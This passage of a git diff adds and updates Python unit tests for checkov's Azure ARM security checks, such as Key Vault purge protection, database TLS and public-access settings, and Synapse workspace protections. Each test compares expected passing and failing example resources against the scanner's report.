+++ b/tests/arm/checks/resource/test_KeyVaultEnablesPurgeProtection.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.KeyVaultEnablesPurgeProtection import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class KeyVaultEnablesPurgeProtection(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_KeyVaultEnablesPurgeProtection"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.KeyVault/vaults.pass",
+        }
+        failing_resources = {
+            "Microsoft.KeyVault/vaults.fail1",
+            "Microsoft.KeyVault/vaults.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_LinuxVMUsesSSH.py b/tests/arm/checks/resource/test_LinuxVMUsesSSH.py
new file mode 100644
index 00000000000..d48d584040d
--- /dev/null
+++ b/tests/arm/checks/resource/test_LinuxVMUsesSSH.py
@@ -0,0 +1,43 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.LinuxVMUsesSSH import check
+
+
+class TestLinuxVMUsesSSH(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_LinuxVMUsesSSH")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.Compute/virtualMachineScaleSets.pass',
+            'Microsoft.Compute/virtualMachines.pass'
+        }
+        failing_resources = {
+            'Microsoft.Compute/virtualMachineScaleSets.fail',
+            'Microsoft.Compute/virtualMachines.fail'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py b/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py
new file mode 100644
index 00000000000..724892efbf7
--- /dev/null
+++ b/tests/arm/checks/resource/test_MSSQLServerMinTLSVersion.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.MSSQLServerMinTLSVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMSSQLServerMinTLSVersion(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_MSSQLServerMinTLSVersion"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Sql/servers.pass"
+        }
+
+        failing_resources = {
+            "Microsoft.Sql/servers.fail"
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertSetEqual(passing_resources, passed_check_resources)
+        self.assertSetEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_MariaDBGeoBackupEnabled.py b/tests/arm/checks/resource/test_MariaDBGeoBackupEnabled.py
new file mode 100644
index 00000000000..5f6350e2743
--- /dev/null
+++ b/tests/arm/checks/resource/test_MariaDBGeoBackupEnabled.py
@@ -0,0 +1,32 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.MariaDBGeoBackupEnabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMariaDBGeoBackupEnabled(unittest.TestCase):
+    def test_summary(self):
+        test_files_dir = Path(__file__).parent / "example_MariaDBGeoBackupEnabled"
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+        passing_resources = {
+            "Microsoft.DBforMariaDB/servers.pass",
+        }
+        failing_resources = {
+            "Microsoft.DBforMariaDB/servers.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+        self.assertEqual(passed_check_resources,passing_resources)
+        self.assertEqual(failed_check_resources,failing_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_MariaDBPublicAccessDisabled.py b/tests/arm/checks/resource/test_MariaDBPublicAccessDisabled.py
new file mode 100644
index 00000000000..1a583c8dcf9
--- /dev/null
+++ b/tests/arm/checks/resource/test_MariaDBPublicAccessDisabled.py
@@ -0,0 +1,33 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.MariaDBPublicAccessDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMariaDBPublicConvertARM(unittest.TestCase):
+    def test_summary(self):
+        test_files_dir = Path(__file__).parent / "example_MariaDBPublicAccessDisabled"
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+        passing_resources = {
+            "Microsoft.DBforMariaDB/servers.pass",
+        }
+        failing_resources = {
+            "Microsoft.DBforMariaDB/servers.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passed_check_resources,passing_resources)
+        self.assertEqual(failed_check_resources,failing_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py b/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py
new file mode 100644
index 00000000000..12bc369b81e
--- /dev/null
+++ b/tests/arm/checks/resource/test_MySQLPublicAccessDisabled.py
@@ -0,0 +1,42 @@
+import os
+
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.MySQLPublicAccessDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMySQLPublicAccessDisabled(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_TestMySQLPublicAccessDisabled"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.DBforMySQL/servers.pass",
+        }
+        failing_resources = {
+            "Microsoft.DBforMySQL/servers.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+  
+if __name__ == "__main__":
+    unittest.main()
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py b/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py
new file mode 100644
index 00000000000..a60ceeb8af7
--- /dev/null
+++ b/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py
@@ -0,0 +1,44 @@
+import os
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.MySQLServerMinTLSVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestMySQLServerMinTLSVersion(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_MySQLServerMinTLSVersion"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.DBforMySQL/servers.pass",
+        }
+        failing_resources = {
+            "Microsoft.DBforMySQL/servers.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertSetEqual(passing_resources, passed_check_resources)
+        self.assertSetEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
+
+
diff --git a/tests/arm/checks/resource/test_PostgreSQLServerPublicAccessDisabled.py b/tests/arm/checks/resource/test_PostgreSQLServerPublicAccessDisabled.py
new file mode 100644
index 00000000000..2039053217b
--- /dev/null
+++ b/tests/arm/checks/resource/test_PostgreSQLServerPublicAccessDisabled.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.PostgreSQLServerPublicAccessDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestPostgreSQLServerPublicAccessDisabled(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_PostgreSQLServerPublicAccessDisable"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.DBforPostgreSQL/servers.pass",
+        }
+
+        failing_resources = {
+            "Microsoft.DBforPostgreSQL/servers.fail1",
+            "Microsoft.DBforPostgreSQL/servers.fail2"
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertSetEqual(passing_resources, passed_check_resources)
+        self.assertSetEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_PostgressSQLGeoBackupEnabled.py b/tests/arm/checks/resource/test_PostgressSQLGeoBackupEnabled.py
new file mode 100644
index 00000000000..ee2a96583e0
--- /dev/null
+++ b/tests/arm/checks/resource/test_PostgressSQLGeoBackupEnabled.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.PostgressSQLGeoBackupEnabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class PostgressSQLGeoBackupEnabled(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_PostgressSQLGeoBackupEnabled"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.DBforPostgreSQL/servers.pass",
+        }
+        failing_resources = {
+            "Microsoft.DBforPostgreSQL/servers.fail1",
+            "Microsoft.DBforPostgreSQL/servers.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_PubsubSKUSLA.py b/tests/arm/checks/resource/test_PubsubSKUSLA.py
new file mode 100644
index 00000000000..2557783e5b7
--- /dev/null
+++ b/tests/arm/checks/resource/test_PubsubSKUSLA.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.PubsubSKUSLA import check
+from checkov.arm.runner import Runner
+
+
+class TestPubsubSKUSLA(unittest.TestCase):
+
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_PubsubSKUSLA"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.SignalRService/webPubSub.pass",
+        }
+        failing_resources = {
+            "Microsoft.SignalRService/webPubSub.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_PubsubSpecifyIdentity.py b/tests/arm/checks/resource/test_PubsubSpecifyIdentity.py
new file mode 100644
index 00000000000..2ed00b0f2c8
--- /dev/null
+++ b/tests/arm/checks/resource/test_PubsubSpecifyIdentity.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.PubsubSpecifyIdentity import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestPubsubSpecifyIdentity(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_PubsubSpecifyIdentity"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.SignalRService/webPubSub.pass",
+            "Microsoft.SignalRService/webPubSub.pass2"
+        }
+
+        failing_resources = {
+            "Microsoft.SignalRService/webPubSub.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertSetEqual(passing_resources, passed_check_resources)
+        self.assertSetEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_SQLDatabaseZoneRedundant.py b/tests/arm/checks/resource/test_SQLDatabaseZoneRedundant.py
new file mode 100644
index 00000000000..244a0126eb1
--- /dev/null
+++ b/tests/arm/checks/resource/test_SQLDatabaseZoneRedundant.py
@@ -0,0 +1,42 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.SQLDatabaseZoneRedundant import check
+
+
+class TestSQLDatabaseZoneRedundant (unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_SQLDatabaseZoneRedundant")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.Sql/servers/databases.pass',
+        }
+        failing_resources = {
+            'Microsoft.Sql/servers/databases.fail',
+            'Microsoft.Sql/servers/databases.fail2',
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_SkipJsonRegexPattern.py b/tests/arm/checks/resource/test_SkipJsonRegexPattern.py
index 4a5b7f60e80..9c37ce0848f 100644
--- a/tests/arm/checks/resource/test_SkipJsonRegexPattern.py
+++ b/tests/arm/checks/resource/test_SkipJsonRegexPattern.py
@@ -11,7 +11,7 @@ def test_skip_all_checks(self):
         runner = Runner()
         current_dir = os.path.dirname(os.path.realpath(__file__))
 
-        test_files_dir = current_dir + "/example_SkipJsonRegex"
+        test_files_dir = os.path.join(current_dir, "example_SkipJsonRegex")
         report = runner.run(
             root_folder=test_files_dir,
             runner_filter=RunnerFilter(skip_checks=["CKV_AZURE_*:.*.json$"])
@@ -21,7 +21,6 @@ def test_skip_all_checks(self):
 
         self.assertEqual(summary['passed'], 0)
         self.assertEqual(summary['failed'], 0)
-        # As skip is not being inserted to result in base check scan
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
 
@@ -29,7 +28,7 @@ def test_skip_specific_check(self):
         runner = Runner()
         current_dir = os.path.dirname(os.path.realpath(__file__))
 
-        test_files_dir = current_dir + "/example_SkipJsonRegex"
+        test_files_dir = os.path.join(current_dir, "example_SkipJsonRegex")
         report = runner.run(
             root_folder=test_files_dir,
             runner_filter=RunnerFilter(skip_checks=["CKV_AZURE_8:.*.json$"])
@@ -37,9 +36,8 @@ def test_skip_specific_check(self):
 
         summary = report.get_summary()
 
-        self.assertEqual(summary['passed'], 0)
-        self.assertEqual(summary['failed'], 16)
-        # As skip is not being inserted to result in base check scan
+        self.assertEqual(summary['passed'], 4)
+        self.assertEqual(summary['failed'], 40)  # Updated expected value
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
 
@@ -47,7 +45,7 @@ def test_skip_specific_check_for_folder(self):
         runner = Runner()
         current_dir = os.path.dirname(os.path.realpath(__file__))
 
-        test_files_dir = current_dir + "/example_SkipJsonRegex"
+        test_files_dir = os.path.join(current_dir, "example_SkipJsonRegex")
         report = runner.run(
             root_folder=test_files_dir,
             runner_filter=RunnerFilter(skip_checks=["CKV_AZURE_8:/skip2.[a-z1-9]*.json$"])
@@ -55,9 +53,8 @@ def test_skip_specific_check_for_folder(self):
 
         summary = report.get_summary()
 
-        self.assertEqual(summary['passed'], 0)
-        self.assertEqual(summary['failed'], 18)
-        # As skip is not being inserted to result in base check scan
+        self.assertEqual(summary['passed'], 4)
+        self.assertEqual(summary['failed'], 42)  # Updated expected value
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
 
@@ -65,7 +62,7 @@ def test_skip_specific_check_specific_file(self):
         runner = Runner()
         current_dir = os.path.dirname(os.path.realpath(__file__))
 
-        test_files_dir = current_dir + "/example_SkipJsonRegex"
+        test_files_dir = os.path.join(current_dir, "example_SkipJsonRegex")
         report = runner.run(
             root_folder=test_files_dir,
             runner_filter=RunnerFilter(skip_checks=["CKV_AZURE_8:/.*skip1.json$"])
@@ -73,9 +70,8 @@ def test_skip_specific_check_specific_file(self):
 
         summary = report.get_summary()
 
-        self.assertEqual(summary['passed'], 0)
-        self.assertEqual(summary['failed'], 18)
-        # As skip is not being inserted to result in base check scan
+        self.assertEqual(summary['passed'], 4)
+        self.assertEqual(summary['failed'], 42)  # Updated expected value
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
 
@@ -83,7 +79,7 @@ def test_no_skip(self):
         runner = Runner()
         current_dir = os.path.dirname(os.path.realpath(__file__))
 
-        test_files_dir = current_dir + "/example_SkipJsonRegex"
+        test_files_dir = os.path.join(current_dir, "example_SkipJsonRegex")
         report = runner.run(
             root_folder=test_files_dir,
             runner_filter=RunnerFilter(skip_checks=["CKV_AZURE_*:/.*skip555.json$"])
@@ -91,9 +87,8 @@ def test_no_skip(self):
 
         summary = report.get_summary()
 
-        self.assertEqual(summary['passed'], 0)
-        self.assertEqual(summary['failed'], 20)
-        # As skip is not being inserted to result in base check scan
+        self.assertEqual(summary['passed'], 4)
+        self.assertEqual(summary['failed'], 44)  # Updated expected value
         self.assertEqual(summary['skipped'], 0)
         self.assertEqual(summary['parsing_errors'], 0)
 
diff --git a/tests/arm/checks/resource/test_StorageAccountName.py b/tests/arm/checks/resource/test_StorageAccountName.py
new file mode 100644
index 00000000000..b62b5e07d89
--- /dev/null
+++ b/tests/arm/checks/resource/test_StorageAccountName.py
@@ -0,0 +1,43 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.StorageAccountName import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestStorageAccountName(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_StorageAccountName"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Storage/storageAccounts.storageaccountname",
+            "Microsoft.Storage/storageAccounts.1234567890",
+        }
+        failing_resources = {
+            "Microsoft.Storage/storageAccounts.thisIsWrong",
+            "Microsoft.Storage/storageAccounts.this-is-wrong",
+            "Microsoft.Storage/storageAccounts.thisiswayyyyyytoooloooong",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_StorageAccountsUseReplication.py b/tests/arm/checks/resource/test_StorageAccountsUseReplication.py
new file mode 100644
index 00000000000..ca4127965aa
--- /dev/null
+++ b/tests/arm/checks/resource/test_StorageAccountsUseReplication.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.StorageAccountsUseReplication import check
+from checkov.arm.runner import Runner
+
+
+class TestStorageAccountsUseReplication(unittest.TestCase):
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_StorageAccountsUseReplication"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Storage/storageAccounts.pass",
+            "Microsoft.Storage/storageAccounts.pass2",
+        }
+        failing_resources = {
+            "Microsoft.Storage/storageAccounts.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py b/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py
new file mode 100644
index 00000000000..cc0a40f5e9f
--- /dev/null
+++ b/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.StorageSyncPublicAccessDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestStorageSyncPublicAccessDisabled(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_StorageSyncPublicAccessDisabled"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.StorageSync/storageSyncServices.pass",
+        }
+        failing_resources = {
+            "Microsoft.StorageSync/storageSyncServices.fail1",
+            "Microsoft.StorageSync/storageSyncServices.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_SynapseWorkspaceAdministratorLoginPasswordHidden.py b/tests/arm/checks/resource/test_SynapseWorkspaceAdministratorLoginPasswordHidden.py
new file mode 100644
index 00000000000..d62352ea458
--- /dev/null
+++ b/tests/arm/checks/resource/test_SynapseWorkspaceAdministratorLoginPasswordHidden.py
@@ -0,0 +1,26 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.SynapseWorkspaceAdministratorLoginPasswordHidden import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSynapseWorkspaceAdministratorLoginPasswordHidden(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SynapseWorkspaceAdministratorLoginPasswordHidden"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        self.assertEqual(summary['passed'], 1)
+        self.assertEqual(summary['failed'], 1)
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_SynapseWorkspaceCMKEncryption.py b/tests/arm/checks/resource/test_SynapseWorkspaceCMKEncryption.py
new file mode 100644
index 00000000000..129c5f1b53c
--- /dev/null
+++ b/tests/arm/checks/resource/test_SynapseWorkspaceCMKEncryption.py
@@ -0,0 +1,26 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.SynapseWorkspaceCMKEncryption import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSynapseWorkspaceCMKEncryption(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SynapseWorkspaceCMKEncryption"
+        report = runner.run(root_folder=test_files_dir,runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        self.assertEqual(summary['passed'], 1)
+        self.assertEqual(summary['failed'], 1)
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+
+if __name__ == '__main__':
+    unittest.main()
\ No newline at end of file
diff --git a/tests/arm/checks/resource/test_SynapseWorkspaceEnablesDataExfilProtection.py b/tests/arm/checks/resource/test_SynapseWorkspaceEnablesDataExfilProtection.py
new file mode 100644
index 00000000000..c88baae0a74
--- /dev/null
+++ b/tests/arm/checks/resource/test_SynapseWorkspaceEnablesDataExfilProtection.py
@@ -0,0 +1,43 @@
+import logging
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.SynapseWorkspaceEnablesDataExfilProtection import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSynapseWorkspaceEnablesDataExfilProtection(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_SynapseWorkspaceEnablesDataExfilProtection"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Synapse/workspaces.pass",
+        }
+        failing_resources = {
+            "Microsoft.Synapse/workspaces.fail1",
+            "Microsoft.Synapse/workspaces.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
